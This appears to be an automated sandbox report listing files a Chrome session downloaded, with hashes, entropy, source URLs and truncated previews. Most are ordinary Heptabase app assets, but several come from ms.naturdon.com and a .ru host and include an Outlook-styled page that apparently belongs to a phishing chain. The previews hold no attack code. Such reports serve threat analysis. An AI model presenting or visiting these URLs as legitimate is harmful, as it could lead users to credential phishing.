                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (65535), with no line terminators
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):6159602
                                                                                                                                                                                                                        Entropy (8bit):5.635654507974073
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:9BCF96B3024208ED40A9E0942A4BD298
                                                                                                                                                                                                                        SHA1:AA3B4A29607C61E8510B350F1D5FF1E397E4F586
                                                                                                                                                                                                                        SHA-256:DAEB65E2C90D8FC283335117743F34546EA74AD437F7C90978C402AD46E64476
                                                                                                                                                                                                                        SHA-512:0EF1F854E77E1821FE9E037B71D1D85773690FDDD05CE186161501F34944BCBA3DA667E2D29990A8BEF471F2AA60E743C088A1390B414E8F398E960AEEEFA5D6
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://app.heptabase.com/assets/main-4c0c8700.js
                                                                                                                                                                                                                        Preview:var Yd=Object.defineProperty;var Jd=(T,F,K)=>F in T?Yd(T,F,{enumerable:!0,configurable:!0,writable:!0,value:K}):T[F]=K;var Vn=(T,F,K)=>(Jd(T,typeof F!="symbol"?F+"":F,K),K),ic=(T,F,K)=>{if(!F.has(T))throw TypeError("Cannot "+K)};var Bt=(T,F,K)=>(ic(T,F,"read from private field"),K?K.call(T):F.get(T)),Gn=(T,F,K)=>{if(F.has(T))throw TypeError("Cannot add the same private member more than once");F instanceof WeakSet?F.add(T):F.set(T,K)},pr=(T,F,K,Y)=>(ic(T,F,"write to private field"),Y?Y.call(T,K):F.set(T,K),K);var Ho=(T,F,K,Y)=>({set _(J){pr(T,F,J,K)},get _(){return Bt(T,F,Y)}}),or=(T,F,K)=>(ic(T,F,"access private method"),K);import{c as commonjsGlobal,H as HeptaAuthError,d as dayjs$2,a as assert,s as sortByDate,r as reactDomExports,b as reactExports,e as datadogLogs,A as APP_VERSION,f as appEnv,j as jsx,g as classNames,u as useOnUnmount,h as useReduxDispatch,i as setIsScrimWindowOpen,k as useOnMount,l as jsxs,m as isMobileApp,P as Plugin$1,n as key$2,o as drawCellSelection,p as handleKe
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):100
                                                                                                                                                                                                                        Entropy (8bit):4.509882725238736
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:297B0CE8D429E36F47C944DB7B16D6FD
                                                                                                                                                                                                                        SHA1:669BF0EF2F7C4B9AE00E87128A0EE34AD5F5912E
                                                                                                                                                                                                                        SHA-256:0F9D4E88422AE85F100C80E229D87341C1464169E3322BEA9C69B1C3FA1B924C
                                                                                                                                                                                                                        SHA-512:E1528AC1850347B26B15CAB9850D2310AFD1067C330A06BD7A228CAABDAC51FAAED9CFE113FC2143670F1FFE76B680E2C82F191C125C43A0700228BF4DEAA367
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhJKCQWNZ-KtWjofEgUNzyMq_xIFDcWTxCQSBQ2JpWfLEgUNwxk5kBIFDYmlZ8sSBQ3DGTmQEgUN0AJA7BIFDahd43QhSWC_tBpubWw=?alt=proto
                                                                                                                                                                                                                        Preview:CkgKBw3PIyr/GgAKBw3Fk8QkGgAKBw2JpWfLGgAKBw3DGTmQGgAKBw2JpWfLGgAKBw3DGTmQGgAKBw3QAkDsGgAKBw2oXeN0GgA=
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):2905
                                                                                                                                                                                                                        Entropy (8bit):3.962263100945339
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:FE87496CC7A44412F7893A72099C120A
                                                                                                                                                                                                                        SHA1:A0C1458C08A815DF63D3CB0406D60BE6607CA699
                                                                                                                                                                                                                        SHA-256:55CE3B0CE5BC71339308107982CD7671F96014256DED0BE36DC8062E64C847F1
                                                                                                                                                                                                                        SHA-512:E527C6CD2A3D79CA828A9126E8FF7009A540AA764082750D4FA8207C2B8439CA1FDC4459E935D708DC59DCFFE55FE45188EB5E266D1B745FCA7588501BC0117D
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M30.422,29.092a3.493,3.493,0,0,1,1.324.261,3.381,3.381,0,0,1,1.132.749q.366.366.827.775t.949.854q.488.444.941.932a9.974,9.974,0,0,1,.819,1A4.951,4.951,0,0,1,37,34.736a3.133,3.133,0,0,1,.218,1.15,3.493,3.493,0,0,1-.261,1.324,3.381,3.381,0,0,1-.749,1.132q-.888.888-1.6,1.568a8.753,8.753,0,0,1-1.489,1.15,6.17,6.17,0,0,1-1.716.705A9.367,9.367,0,0,1,29.151,42a13.73,13.73,0,0,1-3.9-.592A21.891,21.891,0,0,1,21.26,39.77a27.749,27.749,0,0,1-3.885-2.491,34.863,34.863,0,0,1-3.6-3.153,34.6,34.6,0,0,1-3.127-3.606,27.717,27.717,0,0,1-2.456-3.876A22.2,22.2,0,0,1,6.584,22.69,13.485,13.485,0,0,1,6,18.866,9.453,9.453,0,0,1,6.235,16.6a6.2,6.2,0,0,1,.7-1.707,8.848,8.848,0,0,1,1.141-1.489q.679-.723,1.585-1.611a3.381,3.381,0,0,1,1.132-.749,3.493,3.493,0,0,1,1.324-.261,3.3,3.3,0,0,1,1.681.47,8.648,8.648,0,0,1,1.542,1.15,17.725,17.725,0,0,1,1.376,1.428q.645.
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                                                                                                                                                                                        SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                                                                                                                                                                                        SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                                                                                                                                                                                        SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://dvw4e.ajcffp.ru/jawari!ly1jx
                                                                                                                                                                                                                        Preview:0
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):374
                                                                                                                                                                                                                        Entropy (8bit):4.531154126417689
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:C11CCEA10C59D4961F2540BC77499F8B
                                                                                                                                                                                                                        SHA1:C4181B0DE98834334F52B93E0DB03CA7A78D0781
                                                                                                                                                                                                                        SHA-256:3050919E6B8F6874007E2F8E24E8ECF0EBE39A41C764514257D4B4B6992DD2FC
                                                                                                                                                                                                                        SHA-512:D379C269FF41CCEA961B1134E66BEB96DABDABBE0232F4328F99D9839F50086383B99A986570EEA046B94264900526C03822F6EB3F591300D27023A351966D8E
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://app.heptabase.com/manifest.json
                                                                                                                                                                                                                        Preview:{. "name": "Heptabase",. "short_name": "Hepta",. "icons": [. {. "src": "/android-chrome-192x192.png",. "sizes": "192x192",. "type": "image/png". },. {. "src": "/android-chrome-512x512.png",. "sizes": "512x512",. "type": "image/png". }. ],. "theme_color": "#000000",. "background_color": "#000000",. "display": "standalone".}.
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:Web Open Font Format, TrueType, length 36696, version 1.0
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):36696
                                                                                                                                                                                                                        Entropy (8bit):7.988666025644622
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:A69E9AB8AFDD7486EC0749C551051FF2
                                                                                                                                                                                                                        SHA1:C34E6AA327B536FB48D1FE03577A47C7EE2231B8
                                                                                                                                                                                                                        SHA-256:FD78A1913DB912221B8EAD1E62FAD47D1FF0A9FA6CD88D3B128A721AD91D2FAF
                                                                                                                                                                                                                        SHA-512:9A0E4297282542B8813F9CC85B2CCB09663CE281F64503F9A5284631881DA9AACF7649553BF1423D941F01B97E6BC3BA50AB13E55E4B7B61C5AA0A4ADF4D390F
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://ms.naturdon.com/GDSherpa-regular.woff
                                                                                                                                                                                                                        Preview:wOFF.......X......6........0...(............DSIG...(............GPOS..........^>....GSUB.............3y.OS/2.......F...`h`{Zcmap...........<.?+.cvt .......0...<(...fpgm............?...gasp................glyf.."0..Tl...h...+head..v....4...6..}.hhea..v....!...$...Zhmtx..v........x;...loca..z|...........tmaxp..~$... ... .-..name..~D.......'....post............1+.,prep.............P..x..\.|U..Nr.^.......DD.T....V...C....U._.N..k.8.m...h.Q.6q....#....Y4l.}3.@ .............Z_....s.....>RD.....J....wR./...#.,<'f....4b..}(....P..\.s.9'.....-.Q..d..H.@%..K+....4U.4...yx.3..DkfJ..3S.H......|..........%.B...........W.~..nN<x.?....}jn...W..M.7...?...:-uAjQ.4J.].vm....H{&...y..@....G...~.......x=.V..g.;..@..J.l...G..L... g*M..h.....Q!}B...Q.m.M...R.5*.JUi*..U_5@]..PW...*5H.VW.k..:5D].nP#..5V=....x.....W/...E5I...NVS.T.u...^U3._...m5G-P...U...Gj.*V..j.Z...j..BJ.._Pw..0..f*...q...q5...'.F=MIj.7..^.f."..K\..pHMC.t.W.Z.Bz...l.+.....e|......B>....1.a,.D.Ej..(.
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (52013), with CRLF line terminators
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):151508
                                                                                                                                                                                                                        Entropy (8bit):5.915629574879431
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:2064933765CE6ECD87952B596533A053
                                                                                                                                                                                                                        SHA1:D5B63A75AD22F10AF77B374575A64B07C2C22891
                                                                                                                                                                                                                        SHA-256:26B7F04FB85EF56ACE7A2D2324F6203C33331905D35A9F79541F0EB44C73A7E7
                                                                                                                                                                                                                        SHA-512:DC89603BA36562395776AD509CB4A7BE52951C180A56711EE39547C93012295B3045D3B7C907F18E6E1328A261493C3D0E1490CAF466F86B829CE8758E074C4C
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://ms.naturdon.com/icqvphaklstpaqrjclpxqvkdxiz03jft5l8dw3i9p2yx3gfgx0ym1?RMGDUWTXPSXJWMMIUPGUOYFFNR
                                                                                                                                                                                                                        Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">.. <meta name="robots" content="noindex, nofollow">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title>&#8203;</title>.. <style id="outlooklogostyle">..body#outlooklogo {.. background-color: #fff;.. height: 100%;.. overflow: hidden;..}....:root {.. --s: 180px;.. --envW: 130px;.. --envH: 71px;.. --calW: 118px;.. --sqW: calc(var(--calW) / 3);.. --sqH: 37px;.. --calHH: 20px;.. --calH: calc(var(--sqH) * 3 + var(--calHH));.. --calY: calc(var(--calH) + 20px);.. --calYExt: calc(var(--calH) - 80px);.. --calYOverExt: calc(var(--calH) - 92px);.. --flapS: 96px;.. --flapH: calc(0.55 * var(--envH));.. --flapScaleY: calc(var(--flapH) / var(--flapWidth));.. --dur: 5s..}..#containerShadow,#ef{border-radius:0 0 7px 7px;}..#cal,#cal>.r{display:flex;}..#fmask,#openedFlap{width:var(--envW);height:107px;}..#ca
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 93276, version 1.0
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):93276
                                                                                                                                                                                                                        Entropy (8bit):7.997636438159837
                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:BCD7983EA5AA57C55F6758B4977983CB
                                                                                                                                                                                                                        SHA1:EF3A009E205229E07FB0EC8569E669B11C378EF1
                                                                                                                                                                                                                        SHA-256:6528A0BF9A836A53DFD8536E1786BA6831C9D1FAA74967126FDDF5B2081B858C
                                                                                                                                                                                                                        SHA-512:E868A2702CA3B99E1ABBCBD40B1C90B42A9D26086A434F1CBAE79DFC072216F2F990FEC6265A801BC4F96DB0431E8F0B99EB0129B2EE7505B3FDFD9BB9BAFE90
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://ms.naturdon.com/GDSherpa-vf2.woff2
                                                                                                                                                                                                                        Preview:wOF2......l\....... ..k...........................v...&..$?HVAR.j?MVAR.F.`?STAT.6'8.../.H........x....0..:.6.$..0. ..z...[....%"...........!.I.T....w.!c.H...t.]k......6..Cy..Ul.re........I..%.%....DE....v.i.QF8....iH.!r......P4Z[....Zs....o..r..8b.O....n...!......R}GL..5n!....^..I...A.....U...,&..uz....E.R.K/GL...#..U..A8%.rd..E,}...'e...u..3.dD....}..:..0.a..#O8.|.7..{.}.o......(.D..HX...w.;F...g.+....g.x..,.@~<.K......ZJw......^.!..{:..<..`N..h..0.t..NA..,...]........On./..X|_=...e,.tS..3Z..q_....'F[..jR.?U..k.:+;..Z.co5..l..yV.Md..4.6............L8q..._...AX.y.Cc...Agb..a.K...N....`-..N.b.u...q..i.S...p..j*...fA.......?.Z.Ee.~|.\..TZ._...?./a.64..+.]..(gq..d..\K...S..z.i.l[.........1=....I.....4g.?.G.3.&.0L&.$.@R6...U..o..:.S.=.....bU..u.]z.W8[U.|7.'.%..u...11..g<.^...J..PB.JHB...k........].($..D...S"u...7...9.8.....U..7...R$..x...g.X.zV.,.$....y.:.....Q$OM....q.. ...(.O....".d<.l..9..|^B.r.5......yi.D..._...<P..o....(Re.I...@E.~..T.
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):270
                                                                                                                                                                                                                        Entropy (8bit):4.840496990713235
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:40EB39126300B56BF66C20EE75B54093
                                                                                                                                                                                                                        SHA1:83678D94097257EB474713DEC49E8094F49D2E2A
                                                                                                                                                                                                                        SHA-256:765709425A5B9209E875DCCF2217D3161429D2D48159FC1DF7B253B77C1574F4
                                                                                                                                                                                                                        SHA-512:9C9CD1752A404E71772003469550D3B4EFF8346A4E47BE131BB2B9CB8DD46DBEF4863C52A63A9C63989F9ABEE775CB63C111ADD7AFA9D4DFC7A4D95AE30F9C6E
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12"><title>assets</title><rect width="12" height="12" fill="none"/><path d="M6.7,6,12,11.309,11.309,12,6,6.7.691,12,0,11.309,5.3,6,0,.691.691,0,6,5.3,11.309,0,12,.691Z" fill="#262626"/></svg>
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1298
                                                                                                                                                                                                                        Entropy (8bit):6.665390877423149
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:32CA2081553E969F9FDD4374134521AD
                                                                                                                                                                                                                        SHA1:7B09924C4C3D8B6E41FE38363E342DA098BE4173
                                                                                                                                                                                                                        SHA-256:216FC342A469AA6A005B2EACC24622095E5282D3E9F1AE99CE54C27B92EC3587
                                                                                                                                                                                                                        SHA-512:F75749C6344FCD7BF06872A3678BB2EB4CAE2DDC31CC5D1EE73EFBA843705577841667733A83163AF4336EC8A32DF93E7A36155BD6282D7BB86159644975948C
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:RIFF....WEBPVP8X....0...k.....ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPHX.....\m{.z..........T ..Q....R..*.X....U`..@......Yyy..<q.."b..a....K._.....jH.*...}q..........^.-.\.4. &.H~.q..H.q.'.t..p....0)...X.....8./.... ..6.#H..Y..../...E>.#.tv....9.\.p5......h......1.{@.k].(1...B.........u.n....=....sX...*..I.c]r....S.....u.a...X.....Pi..q.$73..ga..h%9.S.l.....}....^%.@:Q....we8x..j..3.^.}5.fFtZ...3....<. x.s....d@(./.<].y...m.....T..........T.P`....5..<qYl.g..k..N. `_...f....yN.R.PB..p|..-.%.`y.._.]C.v.<.Y...V..I..(.c....>...........k....nt
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:HTML document, ASCII text
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):3419
                                                                                                                                                                                                                        Entropy (8bit):4.780293760007423
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:55ED7F0306E3AE20481D86BD6F6A9A69
                                                                                                                                                                                                                        SHA1:2D6858CCB6756ECD93B765B6B9C3124ACD2DA260
                                                                                                                                                                                                                        SHA-256:60320B130E2DDE31188761DB3384D2475D35F749A64C139023A3B0C940F9C7E9
                                                                                                                                                                                                                        SHA-512:F45C292D922D80183D9737E8E67EAB178B4D78C2E8E5911D5B82AF8A827A81B31E88F436B6C8415ACC43A3EA619A9DC3BE63A1D5198E4707F709557430EBD7B5
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://app.heptabase.com/w/9572b61a878f03208943512867a816847d4d23b4f7ccb0a7fe97bab5d1ad7da7
                                                                                                                                                                                                                        Preview:<!DOCTYPE html>.<html lang="en">. <head>. <meta charset="utf-8" />. <meta. name="viewport". content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0, viewport-fit=cover". />.. <meta. name="description". content="Create visual playgrounds for your notes.". />. <title>Heptabase</title>.. <link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png" />. <link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png" />. <link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png" />. <link rel="manifest" href="/manifest.json" />. <link rel="mask-icon" href="/safari-pinned-tab.svg" color="#5bbad5" />. <meta name="msapplication-TileColor" content="#2b5797" />. <meta name="theme-color" content="#000000" />. <meta name="robots" content="noindex,nofollow" />. <meta. property="og:image". content="https://heptabase.com/assets/images/opengraph-image.png". />.
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):4622
                                                                                                                                                                                                                        Entropy (8bit):7.771723927920211
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:4E60AA2DE553E4705CBF57EC3E0FA2F0
                                                                                                                                                                                                                        SHA1:91B69ED3809086B0FC7E25231B71FA3A8A80A099
                                                                                                                                                                                                                        SHA-256:5C3F2D6BC58270CF0932F6902E094855E8B1C7534F9360EEA615B10060128764
                                                                                                                                                                                                                        SHA-512:1737EAB49EE923E306274E6CD89EE6422B2513919511334122CAAD2057BAE818B01106F658FB73FE73E644C37A1C0C76FBCEC7E741F843AA09F51CB5A60C9D47
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://ms.naturdon.com/bchOwVqc98OOMxFnOkwnvkShNcSm0gU7WWsoh0kKAgri2ChjJkmLJPqsWUfGanp0uBm39YhI6pI8EfQbZqVGjekVGFrK5k97cDmn4NuLgYwOOxiNl3EBbfJ4ReUGdrShKoJ6AAcUp1LOhPfarPQ0dVtop662
                                                                                                                                                                                                                        Preview:RIFF....WEBPVP8X....0...U..G..ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH>...... .....6....?w....JP.A..m.u.m...m..?...m5m.m......c.q~7...%...0}x"k.@....i.Yo..6.h..ho..9...6C{_%..O.:t.S.CNx7.\6w.c...:{..2....9./...;[.1.J...oqu........a...9...+M..>K.3MU.vA75..mt....7..Bc...&..M:..N....u.dM.%V9....;...C.e2..o...!. ..7.;m...Y.t..`..0..X....~e....<.M..........[.....t..?..>.q.!.7.c.......F,m.j.....@.\..}.F...q.......rd..v.].D.5ep..^.......?(......\R.....$..f.y.5....v._..M.i...e...qM..}D.5..!.....g|DZ..."1..(oB.y....[5..F;.A.&.3.....6.0Z...Y...+G..qk
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (501)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):561
                                                                                                                                                                                                                        Entropy (8bit):5.416727836569209
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:22C9A4263A2D2123B8C6A536253E4ED5
                                                                                                                                                                                                                        SHA1:92B8E9D055D03A7DDF729A2EE7437B8B976374A3
                                                                                                                                                                                                                        SHA-256:22AB19F49F7F80647F3B70DCCB319F36EAA67114C118F1C9B3825779A9297578
                                                                                                                                                                                                                        SHA-512:4D54ED5C7D29173E08C7901D49F775E0C34F43D7698643F2D9D7648F33A081AE925DF70AC2C41C77D8AA2E955C4BD79736AC9EA35DEEF8D40434B54D3D542697
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://app.heptabase.com/assets/is-plan-event-enabled-e020507e.js
                                                                                                                                                                                                                        Preview:(function(){try{var e=typeof window<"u"?window:typeof global<"u"?global:typeof self<"u"?self:{},d=new Error().stack;d&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[d]="0aa97029-3b1c-4f6d-a1f6-182b7e188548",e._sentryDebugIdIdentifier="sentry-dbid-0aa97029-3b1c-4f6d-a1f6-182b7e188548")}catch{}})();function i(e,d){var n,o;return typeof(d==null?void 0:d.enabled)=="boolean"?d.enabled:(o=(n=e==null?void 0:e.__default)===null||n===void 0?void 0:n.enabled)!==null&&o!==void 0?o:!0}export{i};.//# sourceMappingURL=is-plan-event-enabled-e020507e.js.map.
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 105924, version 1.0
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):105924
                                                                                                                                                                                                                        Entropy (8bit):7.99656515123012
                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:75DB5319E7E87C587019A5DF08D7272C
                                                                                                                                                                                                                        SHA1:92B30527304B5DC80F45E997E0B1AC4C70110A18
                                                                                                                                                                                                                        SHA-256:1B498B959E5B7DECBF9185803591D25BC1FBF83E798372ED30D32D5C79D82FF6
                                                                                                                                                                                                                        SHA-512:4E556D80B52DDBADDDF9287F6CDAEF0D12113D0FA4A07728FD67767B97806EBA5FA0F82711F71E76EE2875192D7618A9B6C277CEB6D69A30F76CA8E3EBB74AA1
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://app.heptabase.com/assets/Inter-Medium-1b498b95.woff2?v=3.19
                                                                                                                                                                                                                        Preview:wOF2...................e..............................r...J.`.......0.....T..6.$..N. ......-[U4..*...9-.I..J.*h....O .kD3=,(].e.Q.{..Ip...Q..-E~x...^...Y.....g..............7.....7.....$...;....'H...V..0.j...F1..A..H.sL...+..%.j."I...n......c0..1..&.L.%.U.M.)f>A<'.9......Z....+n..)$8...F.)..4..l......a.A.\...2.....c..\....},...Y.i.W.'.x.....y.T......ev$..`G.$m.O"B..k;n...t...N.'r..w..C8.fcb.LJ%j...$i=.I.P2.ns.L..l.."|......j.....8.^.i.....p.*[.i.:...0.E....}4pS<...y.....*.......=..LI%..[5..#n...2o..^..F!.G"...XV^.D......;.@.......#2.m.g.....fq~..u..A.CS..d.c.)R...D.4&..[.$.....U.W.id.+..r...Z&..._....P..)...;..v.9/.a..z......kf>c......_...k..e0Y......eF.8..}K......{.SH ......p.....X...kN.4..".Q......#s...../. ...1..C.....]P+2Pv!d/.,..8.4VNw...q..<A....m.Y...B..".>P{.L._......6H.9...4..l|......Z..e..../^B..}E..o.;......bk7.r..C.v..5.3..Wv..T..#X+Q...0.G.d..j_...<.....s.F.-...<..qq..d......}..i..A...;.Y+.]UU)"..'.9..N.4M.W..?.0.C...d.+.......
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                                                                        Entropy (8bit):3.5
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:F1C9C44E663E7E62582E3F5B236C1C72
                                                                                                                                                                                                                        SHA1:E142F3A0C2D1CDF175A5C3AF43AD66FEFE208B1F
                                                                                                                                                                                                                        SHA-256:D843E67FBFA1F5CB0024062861EE26860C5A866F80755CF39B3465459A8538B9
                                                                                                                                                                                                                        SHA-512:19FE62CB9D884BB3424C51DD15E74EB22E5A639BABF8398BACEBB781862296FA0D7AEE39C88CB9C7AF5791FD58830AC3433F5C6BD94B1BA3912AB33151E93452
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIZCROBG7-A8E35EgUNNzCpMCF7DcBosWhTaQ==?alt=proto
                                                                                                                                                                                                                        Preview:CgkKBw03MKkwGgA=
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:gzip compressed data, from Unix, original size modulo 2^32 6742
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):2674
                                                                                                                                                                                                                        Entropy (8bit):7.918195555973264
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                        MD5:296DA533AFE1B15719C1A461DFD9E025
                                                                                                                                                                                                                        SHA1:9DE8744A8DC891BEDB65B2D1AA2513BEF03884CE
                                                                                                                                                                                                                        SHA-256:924FA69084136EFA2E4B53A33EAAE9932D6B985566377B7A945606971D65FF98
                                                                                                                                                                                                                        SHA-512:401A39143D8BF90EDAD5DCD06A303CDEA3B18AB58392214A5F280B2F40263E05CD536283FEDFEED13FAFF1FF9E07899157D9BFE04B052AC41BAF6B09CFDC5AB4
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:unknown
